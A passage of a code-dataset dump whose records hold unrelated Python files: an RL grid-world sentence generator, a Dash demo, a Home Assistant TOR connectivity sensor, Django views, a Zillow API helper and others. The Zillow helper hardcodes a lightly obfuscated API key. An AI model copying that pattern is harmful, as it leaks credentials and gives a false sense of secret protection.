= reward_dict[req_ind][1]\n\n\t\tsize = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\n\t\tflagn = 0\n\t\tflags = 0\n\t\tflage = 0\n\t\tflagw = 0\n\t\tpos_n = []\n\t\tpos_s = []\n\t\tpos_e = []\n\t\tpos_w = []\n\n\t\tfor s in range(size):\n\t\t\tif ry+s <= cols-1 and rx-1 >= 0:\n\t\t\t\tif reachable[rx-1][ry+s] == 1.0 and ids[rx-1][ry+s] == 0.0:\n\t\t\t\t\tpos_n.append(((rx-1, ry+s), 1))\n\t\t\t\t\tflagn = 1\n\n\t\t\tif ry+s <= cols-1 and rx+size <= rows-1:\n\t\t\t\tif reachable[rx+size][ry+s] == 1.0 and ids[rx+size][ry+s] == 0.0:\n\t\t\t\t\tpos_s.append(((rx+size, ry+s), 1))\n\t\t\t\t\tflags = 1\n\n\t\t\tif ry-1 >= 0 and rx+s <= rows-1:\n\t\t\t\tif reachable[rx+s][ry-1] == 1.0 and ids[rx+s][ry-1] == 0.0:
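 # west neighbor cell is reachable and not occupied by another object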
\n\t\t\t\t\tpos_w.append(((rx+s, ry-1), 1))\n\t\t\t\t\tflagw = 1\n\n\t\t\tif ry+size <= cols-1 and rx+s <= rows-1:\n\t\t\t\tif reachable[rx+s][ry+size] == 1.0 and ids[rx+s][ry+size] == 0.0:\n\t\t\t\t\tpos_e.append(((rx+s, ry+size), 1))\n\t\t\t\t\tflage = 1\n\n\t\tif flagn == 1:\n\t\t\ts = \"Go to north of \" + item[\"size\"]+ \" \" + item[\"color\"] + \" \" +item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_n:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_n)\n\n\t\tif flags == 1:\n\t\t\ts = \"Go to south of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_s:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_s)\n\n\t\tif flagw == 1:\n\t\t\ts = \"Go to west of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_w:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_w)\n\n\t\tif flage == 1:\n\t\t\ts = \"Go to east of \" + item[\"size\"]+ \" \" +item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tfor ele in pos_e:\n\t\t\t\t\t\tpos_size[ind].append(ele)\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append(pos_e)\n\t\n\treturn possible_sentences, pos_size\n\n# Case 8: Go to top/bottom right/left corners\ndef genCornerSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids):\n\trows, cols = reachable.shape\n\tif reachable[0][0] == 1.0 and ids[0][0] == 0.0:\n\t\ts = \"Go to top left corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((0,0), 1)])\n\n\tif reachable[0][cols-1] == 1.0 and ids[0][cols-1] == 0.0:\n\t\ts = \"Go to top right corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((0,cols-1), 1)])\n\n\tif reachable[rows-1][0] == 1.0 and ids[rows-1][0] == 0.0:\n\t\ts = \"Go to bottom left corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((rows-1,0), 1)])\n\n\tif reachable[rows-1][cols-1] == 1.0 and ids[rows-1][cols-1] == 0.0:\n\t\ts = \"Go to bottom right corner\"\n\t\tfl = checkVocab(s, vocabulary)\n\t\tif fl == 0:\n\t\t\tpossible_sentences.append(s)\n\t\t\tpos_size.append([((rows-1,cols-1), 1)])\n\n\n\treturn possible_sentences, pos_size\n\n# Case 9: Go to \n# Case 10: Go to \ndef genAttrSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards):\n\t\n\tobj_name = []\n\tobj_attr = []\n\tobj_locsz = []\n\n\tids1 = []\n\treachable_objs = []\n\treachable_objs_attr = []\n\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\tids1 = np.array(ids1)\t\n\n\tfor item in data[\"objects\"]:\n\t\t\n\t\tide = 
item[\"id\"]\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\t\n\t\treq_ind = req_ind[0][0]\n\t\t#print req_ind\n\t\tloc = reward_dict[req_ind][1]\n\t\tsz = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\t\t\n\t\tif reachable[loc] == 1.0:\n\t\t\tname = item[\"size\"] + \" \" + item[\"color\"] +\" \"+item[\"type\"]\n\t\t\tif not name in reachable_objs :\n\t\t\t\treachable_objs.append(name)\n\t\t\t\treachable_objs_attr.append([(loc,sz)])\n\n\t\t\tname = item[\"color\"] +\" \"+item[\"type\"]\t\t\n\t\t\tif name in obj_name:\n\t\t\t\tind = obj_name.index(name)\n\t\t\t\tobj_attr[ind].append((item[\"size\"], item[\"color\"]))\n\t\t\t\tobj_locsz[ind].append((loc, sz))\n\t\t\telse:\n\t\t\t\tobj_name.append(name)\n\t\t\t\tobj_attr.append([(item[\"size\"], item[\"color\"])])\n\t\t\t\tobj_locsz.append([(loc, sz)])\n\n\t\t\ts = \"Go to \" + item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\t\t\tts = \"There is a \" + item[\"color\"] + \" \" + item[\"type\"] + \" Go to it\"\n\t\t\tfl = checkVocab(ts, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif ts in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(ts)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(ts)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\n\t\t\t\n\n\t\t\ts1 = \"Go to \" + item[\"size\"] + \" \" + item[\"color\"] + \" \" + item[\"type\"]\n\t\t\tfl = checkVocab(s1, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif s1 in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s1)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s1)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\t\t\t\n\t\t\tts1 = \"There is a \" + item[\"size\"] + \" \" + item[\"color\"] + \" \" + item[\"type\"] + \" Go to it\"\n\t\t\tfl = checkVocab(ts1, vocabulary)\n\t\t\t\n\t\t\tif fl == 0:\n\t\t\t\tif ts1 in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(ts1)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(ts1)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\t\t\t\n\t\t\n\tfor i in range(len(obj_name)):\n\t\tif len(obj_attr[i]) > 1:\n\t\t\t\n\t\t\ttsd2 = \"There are multiple \" + obj_name[i] + \" Go to larger one\"\n\t\t\ttsd3 = \"There are multiple \" + obj_name[i] + \" Go to smaller one\"\t\t\t\n\t\t\treq_small = req_large = prev_large = 1\n\t\t\tprev_small = 3\n\t\t\t\n\t\t\tfor j in range(len(obj_locsz[i])):\n\t\t\t\tif obj_locsz[i][j][1] < prev_small:\n\t\t\t\t\tprev_small = obj_locsz[i][j][1]\n\t\t\t\t\treq_small = obj_locsz[i][j]\n\t\t\t\tif obj_locsz[i][j][1] > prev_large:\n\t\t\t\t\tprev_large = obj_locsz[i][j][1]\n\t\t\t\t\treq_large = obj_locsz[i][j]\n\t\t\t\n\t\t\tfl2 = checkVocab(tsd2, vocabulary)\n\t\t\tif fl2 == 0:\n\t\t\t\tif req_large != 1 and req_small != 1:\n\t\t\t\t\tpossible_sentences.append(tsd2)\n\t\t\t\t\tpos_size.append([req_large])\n\t\t\tfl3 = checkVocab(tsd3, vocabulary)\n\t\t\tif fl3 == 0:\n\t\t\t\tif req_small != 1 and req_large != 1:\n\t\t\t\t\tpossible_sentences.append(tsd3)\n\t\t\t\t\tpos_size.append([req_small])\n\t\n\t\t\t\t\t\t\t\n\treturn possible_sentences, pos_size\n\ndef isDistanceinSentence(sentence) :\n\tif 'north' in sentence :\n\t\treturn 
True\n\tif 'south' in sentence :\n\t\treturn True\n\tif 'east' in sentence :\n\t\treturn True\n\tif 'west' in sentence :\n\t\treturn True\n\treturn False\n\ndef genPossibleSentences(reachable, reward_dict, data, vocabulary,ids, active_rewards):\n\t\n\t\n\tmax_sentence_length = 9\n\n\tpossible_sentences = []\n\tpos_size = []\n\t\n\tobj_name = []\n\tobj_attr = []\n\tobj_locsz = [] \n\n\t\t\n\tpossible_sentences, pos_size = genObjectSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards)\t\n\t\t\t\n\tpossible_sentences, pos_size = genLocSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids, active_rewards)\n\n\tpossible_sentences, pos_size = genCornerSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids)\n\t\n\tpossible_sentences, pos_size = genAttrSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards)\n\n\t\n\t#for s in possible_sentences:\n\t#\tprint(s)\n\n\t\n\tif len(possible_sentences) == 0 :\n\t\treturn []\n\tindex_value = random.sample(list(enumerate(possible_sentences)), 1)\n\ts = index_value[0][1]\n\tdistanceInSentence = isDistanceinSentence(s)\n\ts = s.split(\" \")\n\trem = max_sentence_length - len(s)\n\tchar_to_int = dict((c, i) for i, c in enumerate(vocabulary))\n\tint_to_char = dict((i, c) for i, c in enumerate(vocabulary))\n\tinteger_encoded = [char_to_int[char] for char in s]\n\tonehot_encoded = list()\n\n\tfor value in integer_encoded:\n\t\tletter = [0 for _ in range(len(vocabulary))]\n\t\tletter[value] = 1\n\t\tonehot_encoded.append(letter)\n\n\tpad = [0]*len(vocabulary)\n\tfor r in range(rem):\n\t\tonehot_encoded.append(pad)\n\n\t\n\treturn [index_value[0][1], onehot_encoded, pos_size[index_value[0][0]], distanceInSentence]\n\n\n\ndef bfs(game_map,start_pos,reward_dict, data, vocabulary,ids, active_rewards) :\n\tx,y = game_map.shape\n\tflags = np.zeros([x*y])\n\tflags[start_pos[0]*x+start_pos[1]] = 1\n\tq = deque([])\n\tq.append(start_pos[0]*x+start_pos[1])\n\twhile q :\n\t\tpos = q.popleft()\n\t\tq,flags = addNodes((pos/x,pos%x),(x,y),flags,q,game_map)\n\n\t\n\treachable = np.zeros([x,y])\n\tfor i in range(x) :\n\t\tfor j in range(y) :\n\t\t\treachable[i,j] = flags[i*x+j]\t\t\t\n\tarr = genPossibleSentences(reachable, reward_dict, data, vocabulary,ids, active_rewards)\n\t\n\treturn arr\n\t\n\n# if __name__ == '__main__' :\n# \ta = np.zeros([3,3])\n# \tstart_pos = (1,1)\n# \ta[1,0] = 1\t\n# \ta[2,1] = 1\n# \treachable, reward_dict = bfs(a,start_pos,[[0,(2,2)],[1,(0,2)],[2,(2,0)]])\n# \tprint('reachable is ', reachable)\n# \tprint('reward dict is ', reward_dict)\n\n","repo_name":"rl-lang-grounding/rl-lang-ground","sub_path":"generateSentence.py","file_name":"generateSentence.py","file_ext":"py","file_size_in_byte":11814,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"16223822215","text":"def fibo(n):\n if n > 2:\n fn = fibo(n-1) + fibo(n-2)\n else:\n return 1\n return fn\n\nn = int(input(\"Digite quantos números da sequência você quer: \"))\nfn = 0\nprint(fibo(n))","repo_name":"GabGomes16/Algoritmos-e-Logica-de-Programacao-II","sub_path":"trimestre-1/numeros-de-Fibonacci.py","file_name":"numeros-de-Fibonacci.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36758136457","text":"### Import packeges ###\r\nfrom dash import Dash, html, dcc, dash_table, callback, 
Output, Input, State, dash_table, exceptions\r\nimport pandas as pd \r\nimport numpy as np\r\n# import ipywidgets as widgets\r\n# from IPython.display import display\r\nimport plotly.express as px\r\nimport plotly.graph_objs as go\r\nfrom plotly.subplots import make_subplots\r\nfrom datetime import datetime, timedelta, date\r\nfrom dateutil.relativedelta import relativedelta\r\nimport os\r\n\r\n\r\n\r\n### Dash creation ###\r\napp = Dash(__name__, suppress_callback_exceptions=True)\r\nserver = app.server\r\n\r\n\r\n### First page layout ###\r\nhomepage_layout = html.Div(\r\n className='total',\r\n children=[\r\n html.H1('Enzo vacilão'),\r\n dcc.Graph(id='graph')\r\n ]\r\n)\r\n\r\n@app.callback(\r\n Output('graph', 'figure'),\r\n [Input('graph', 'id')]\r\n)\r\ndef update_graph(graph_id):\r\n df = pd.DataFrame(dict(\r\n x = [1, 3, 2, 4],\r\n y = [1, 2, 3, 4]\r\n ))\r\n fig = px.line(df, x=\"x\", y=\"y\", title=\"Unsorted Input\") \r\n return fig\r\n\r\n\r\n### Def layout ###\r\napp.layout = homepage_layout\r\n\r\n\r\n\r\n# Execute o aplicativo Dash\r\nif __name__ == '__main__':\r\n app.run_server(debug=True) \r\n \r\n","repo_name":"rodrigocardosos/dash_deploy_test","sub_path":"dash_teste.py","file_name":"dash_teste.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30126089226","text":"\"\"\"Binary sensor platform for TOR Check custom component.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Mapping\nfrom typing import Any\n\nfrom homeassistant.components.binary_sensor import (\n BinarySensorDeviceClass,\n BinarySensorEntity,\n BinarySensorEntityDescription,\n)\n\nfrom .const import ATTR_REAL_IP, ATTR_TOR_IP, DOMAIN\nfrom .coordinator import (\n KEY_MY_IP,\n KEY_MY_TOR_IP,\n KEY_TOR_CONNECTED,\n TorCheckDataUpdateCoordinator,\n)\nfrom .entity import TorCheckEntity\n\nENTITY_DESCRIPTIONS = (\n BinarySensorEntityDescription(\n key=\"tor_check\",\n name=\"TOR\",\n device_class=BinarySensorDeviceClass.CONNECTIVITY,\n ),\n)\n\n\nasync def async_setup_entry(hass, entry, async_add_devices):\n \"\"\"Set up the binary_sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n async_add_devices(\n TorCheckBinarySensor(\n coordinator=coordinator,\n entity_description=entity_description,\n )\n for entity_description in ENTITY_DESCRIPTIONS\n )\n\n\nclass TorCheckBinarySensor(TorCheckEntity, BinarySensorEntity):\n \"\"\"TOR Check binary sensor class.\"\"\"\n\n def __init__(\n self,\n coordinator: TorCheckDataUpdateCoordinator,\n entity_description: BinarySensorEntityDescription,\n ) -> None:\n \"\"\"Initialize the binary_sensor class.\"\"\"\n super().__init__(coordinator)\n self.entity_description = entity_description\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return true if the binary_sensor is on.\"\"\"\n return self.coordinator.data.get(KEY_TOR_CONNECTED)\n\n @property\n def extra_state_attributes(self) -> Mapping[str, Any] | None:\n \"\"\"Return entity specific state attributes.\"\"\"\n attrs = {\n ATTR_REAL_IP: self.coordinator.data.get(KEY_MY_IP),\n ATTR_TOR_IP: self.coordinator.data.get(KEY_MY_TOR_IP),\n }\n attrs.update(super().extra_state_attributes or {})\n return attrs\n","repo_name":"Limych/ha-tor_check","sub_path":"custom_components/tor_check/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"34992541419","text":"from django.shortcuts import render\nfrom .models import Fund, Company, PriceData\n\n\n# Create your views here.\n\n\ndef get_funds(request):\n fund_list = Fund.objects.order_by(\"-market_cap\")\n monthly_winners = Fund.objects.order_by(\"-one_month\")\n annual_winners = Fund.objects.order_by(\"-one_year\")\n company_list = Company.objects.order_by(\"id\")\n price_list = PriceData.objects.order_by(\"-date\")\n context = {\n \"fund_list\": fund_list,\n \"company_list\": company_list,\n \"price_list\": price_list,\n \"monthly_winners\": monthly_winners,\n \"annual_winners\": annual_winners,\n }\n\n return render(request, \"dashboard.html\", context)\n\n\ndef get_single_fund(request, fund):\n fund = fund.replace(\"-\", \" \")\n fund_object = Fund.objects.get(name=fund)\n price_data = PriceData.objects.filter(fund_link=fund_object.id)\n chart_data = []\n\n for price in price_data:\n col = []\n col.append(price.date.strftime(\"%Y-%m\"))\n col.append(price.price)\n chart_data.append(col)\n\n # calculate_returns(fund_list, price_list)\n context = {\n \"fund\": fund_object,\n \"price_data\": price_data,\n \"chart_data\": chart_data,\n }\n return render(request, \"single-fund.html\", context)\n\n\ndef search_funds(request):\n if request.method == \"POST\":\n searched = request.POST[\"searched\"]\n funds = Fund.objects.filter(name__contains=searched)\n\n return render(request, \"search.html\", {\"searched\": searched, \"funds\": funds})\n else:\n return render(request, \"search.html\")\n","repo_name":"NicFindlay/FundList","sub_path":"funds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28991756666","text":"import zillow\nfrom address_handling import Address\nfrom helper import dec\n\n\ndef zillow_api(address):\n home_address = Address(address)\n if home_address.is_zip_good():\n zip_code = home_address.zip_code\n else:\n zip_code = '98058'\n address = '1309 Harrington Ave SE, Renton'\n key = dec('M1-OLo18g1trev4fo_pu1if', 15)\n api = zillow.ValuationApi()\n data = api.GetDeepSearchResults(key, address, zip_code)\n if not isinstance(data, str):\n full_data = api.GetDeepComps(key, data.zpid)\n if not isinstance(full_data, str):\n full_data['principal'].extended_data = data.extended_data\n else:\n full_data = {\n 'principal': data,\n 'comps': [data]\n }\n return full_data\n else:\n return \"Wrong address\"\n","repo_name":"huiyuandiknow/Home_Data_App","sub_path":"zillow_api_handler.py","file_name":"zillow_api_handler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16173258464","text":"from grammars.grammars import lang_dict\nfrom treemanager import TreeManager\n\njava = lang_dict[\"Java\"]\n\nclass Test_Java:\n def setup_class(cls):\n parser, lexer = java.load()\n cls.lexer = lexer\n cls.parser = parser\n cls.parser.init_ast()\n cls.ast = cls.parser.previous_version\n cls.treemanager = TreeManager()\n cls.treemanager.add_parser(cls.parser, cls.lexer, java.name)\n\n def reset(self):\n self.parser.reset()\n self.treemanager = TreeManager()\n self.treemanager.add_parser(self.parser, self.lexer, java.name)\n\n def test_floats_ints(self):\n self.reset()\n program = \"\"\"class C {\n float a = 1F;\n int b = 0_123;\n int c = 0b110;\n long d = 0b110L;\n float f = 0.e1F;\n float g = 0F;\n float h = 0e1F;\n int i = 0e1;\n public main(){\n 
r.d();\n }\n}\"\"\"\n self.treemanager.import_file(program)\n assert self.parser.last_status == True\n","repo_name":"softdevteam/eco","sub_path":"lib/eco/test/test_grammars.py","file_name":"test_grammars.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"73120461673","text":"\n#%%\nimport pandas\n\ndf = pandas.read_csv('./data/browser-ww-monthly-200901-201909.csv')\n# from https://gs.statcounter.com/browser-market-share#monthly-200901-201909\ndf.head()\n\n#%%\ndf.tail()\n\n#%%\ndf.index=df['Date']\n\n#%%\ndf['Edge']\n\n# df = df.drop(columns=['Date'])\n\n#%%\nimport matplotlib.pyplot as pyplot\npyplot.rcParams['figure.facecolor'] = '#002B3600'\npyplot.rcParams['axes.facecolor'] = '#00000000'\nCOLOR = 'black'\npyplot.rcParams['text.color'] = COLOR\npyplot.rcParams['axes.labelcolor'] = COLOR\npyplot.rcParams['xtick.color'] = COLOR\npyplot.rcParams['ytick.color'] = COLOR\npyplot.rcParams['lines.color'] = COLOR\npyplot.rcParams['grid.color'] = COLOR\npyplot.rcParams['lines.color'] = COLOR\npyplot.rcParams['legend.facecolor'] = '#ffffff19'\n# pyplot.rcParams['figure.edgecolor'] = COLOR\npyplot.rcParams['axes.edgecolor'] = COLOR\n\nd = {'Chrome': 'b',\n\t'Firefox': 'r',\n\t'IE': 'black',\n\t'Safari': 'g',\n\t'Edge': 'magenta'}\nfor browser in d:\n\tpyplot.plot(df.index, df[browser], d[browser], label=browser)\n# pyplot.plot(ie_points, color='turquoise', label='Internet Explorer')\n# pyplot.plot(firefox_points, color='r', label='Firefox')\n# pyplot.plot(chrome_points, color='b', label='Chrome')\n# pyplot.plot(safari_points, color='g', label='Safari')\n# pyplot.plot(edge_points, color='magenta', label='Edge')\npyplot.legend()\npyplot.title('Browser share')\npyplot.xlabel('Year')\npyplot.ylabel('Share (%)')\npyplot.ylim(0,100)\nax = pyplot.gcf().axes[0]\nax.set_xticks(ax.get_xticks()[::12])\npyplot.grid()\nfigure = pyplot.gcf()\nfigure.set_size_inches((12,10))\npyplot.show()\n\n\n#%%\n","repo_name":"Lrizika/DS-Unit-1-Project-1","sub_path":"e2.py","file_name":"e2.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22360395478","text":"# coding: utf-8\n\n\"\"\"\n Veracode Web Application Scanning Configuration Service API\n\n Web Application Scanning Configuration API Documentation # noqa: E501\n\n OpenAPI spec version: 1.0\n Contact: veracode@veracode.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass AnalysisRequest(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'org_info': 'OrgInformation',\n 'scan_setting': 'ScanSetting',\n 'scans': 'list[ScanRequest]',\n 'schedule': 'ScanSchedule',\n 'special_instructions': 'str',\n 'visibility': 'VisibilitySetup'\n }\n\n attribute_map = {\n 'name': 'name',\n 'org_info': 'org_info',\n 'scan_setting': 'scan_setting',\n 'scans': 'scans',\n 'schedule': 'schedule',\n 'special_instructions': 'special_instructions',\n 'visibility': 'visibility'\n }\n\n def __init__(self, name=None, org_info=None, scan_setting=None, scans=None, 
schedule=None, special_instructions=None, visibility=None): # noqa: E501\n        \"\"\"AnalysisRequest - a model defined in Swagger\"\"\" # noqa: E501\n\n        self._name = None\n        self._org_info = None\n        self._scan_setting = None\n        self._scans = None\n        self._schedule = None\n        self._special_instructions = None\n        self._visibility = None\n        self.discriminator = None\n\n        if name is not None:\n            self.name = name\n        if org_info is not None:\n            self.org_info = org_info\n        if scan_setting is not None:\n            self.scan_setting = scan_setting\n        if scans is not None:\n            self.scans = scans\n        if schedule is not None:\n            self.schedule = schedule\n        if special_instructions is not None:\n            self.special_instructions = special_instructions\n        if visibility is not None:\n            self.visibility = visibility\n\n    @property\n    def name(self):\n        \"\"\"Gets the name of this AnalysisRequest. # noqa: E501\n\n        Name of the Dynamic Analysis. The name must be unique to the application portfolio of the organization and the length must be between 6 and 256 characters. # noqa: E501\n\n        :return: The name of this AnalysisRequest. # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._name\n\n    @name.setter\n    def name(self, name):\n        \"\"\"Sets the name of this AnalysisRequest.\n\n        Name of the Dynamic Analysis. The name must be unique to the application portfolio of the organization and the length must be between 6 and 256 characters. # noqa: E501\n\n        :param name: The name of this AnalysisRequest. # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._name = name\n\n    @property\n    def org_info(self):\n        \"\"\"Gets the org_info of this AnalysisRequest. # noqa: E501\n\n        Organization information. # noqa: E501\n\n        :return: The org_info of this AnalysisRequest. # noqa: E501\n        :rtype: OrgInformation\n        \"\"\"\n        return self._org_info\n\n    @org_info.setter\n    def org_info(self, org_info):\n        \"\"\"Sets the org_info of this AnalysisRequest.\n\n        Organization information. # noqa: E501\n\n        :param org_info: The org_info of this AnalysisRequest. # noqa: E501\n        :type: OrgInformation\n        \"\"\"\n\n        self._org_info = org_info\n\n    @property\n    def scan_setting(self):\n        \"\"\"Gets the scan_setting of this AnalysisRequest. # noqa: E501\n\n        The Dynamic Analysis scan level setting that applies to all URL scans in this analysis. # noqa: E501\n\n        :return: The scan_setting of this AnalysisRequest. # noqa: E501\n        :rtype: ScanSetting\n        \"\"\"\n        return self._scan_setting\n\n    @scan_setting.setter\n    def scan_setting(self, scan_setting):\n        \"\"\"Sets the scan_setting of this AnalysisRequest.\n\n        The Dynamic Analysis scan level setting that applies to all URL scans in this analysis. # noqa: E501\n\n        :param scan_setting: The scan_setting of this AnalysisRequest. # noqa: E501\n        :type: ScanSetting\n        \"\"\"\n\n        self._scan_setting = scan_setting\n\n    @property\n    def scans(self):\n        \"\"\"Gets the scans of this AnalysisRequest. # noqa: E501\n\n        The list of URL scans included in the analysis. # noqa: E501\n\n        :return: The scans of this AnalysisRequest. # noqa: E501\n        :rtype: list[ScanRequest]\n        \"\"\"\n        return self._scans\n\n    @scans.setter\n    def scans(self, scans):\n        \"\"\"Sets the scans of this AnalysisRequest.\n\n        The list of URL scans included in the analysis. # noqa: E501\n\n        :param scans: The scans of this AnalysisRequest. # noqa: E501\n        :type: list[ScanRequest]\n        \"\"\"\n\n        self._scans = scans\n\n    @property\n    def schedule(self):\n        \"\"\"Gets the schedule of this AnalysisRequest. # noqa: E501\n\n        The schedule for the URL scan. This is optional. If not specified, no URL scans will run. You can still run verification scans. 
# noqa: E501\n\n :return: The schedule of this AnalysisRequest. # noqa: E501\n :rtype: ScanSchedule\n \"\"\"\n return self._schedule\n\n @schedule.setter\n def schedule(self, schedule):\n \"\"\"Sets the schedule of this AnalysisRequest.\n\n The schedule for the URL scan. This is optional. If not specified, no URL scans will run. You can still run verification scans. # noqa: E501\n\n :param schedule: The schedule of this AnalysisRequest. # noqa: E501\n :type: ScanSchedule\n \"\"\"\n\n self._schedule = schedule\n\n @property\n def special_instructions(self):\n \"\"\"Gets the special_instructions of this AnalysisRequest. # noqa: E501\n\n Special instructions related to the Dynamic Analysis. Can be null. Instructions can delay the analysis. # noqa: E501\n\n :return: The special_instructions of this AnalysisRequest. # noqa: E501\n :rtype: str\n \"\"\"\n return self._special_instructions\n\n @special_instructions.setter\n def special_instructions(self, special_instructions):\n \"\"\"Sets the special_instructions of this AnalysisRequest.\n\n Special instructions related to the Dynamic Analysis. Can be null. Instructions can delay the analysis. # noqa: E501\n\n :param special_instructions: The special_instructions of this AnalysisRequest. # noqa: E501\n :type: str\n \"\"\"\n\n self._special_instructions = special_instructions\n\n @property\n def visibility(self):\n \"\"\"Gets the visibility of this AnalysisRequest. # noqa: E501\n\n Visibility setup. # noqa: E501\n\n :return: The visibility of this AnalysisRequest. # noqa: E501\n :rtype: VisibilitySetup\n \"\"\"\n return self._visibility\n\n @visibility.setter\n def visibility(self, visibility):\n \"\"\"Sets the visibility of this AnalysisRequest.\n\n Visibility setup. # noqa: E501\n\n :param visibility: The visibility of this AnalysisRequest. 
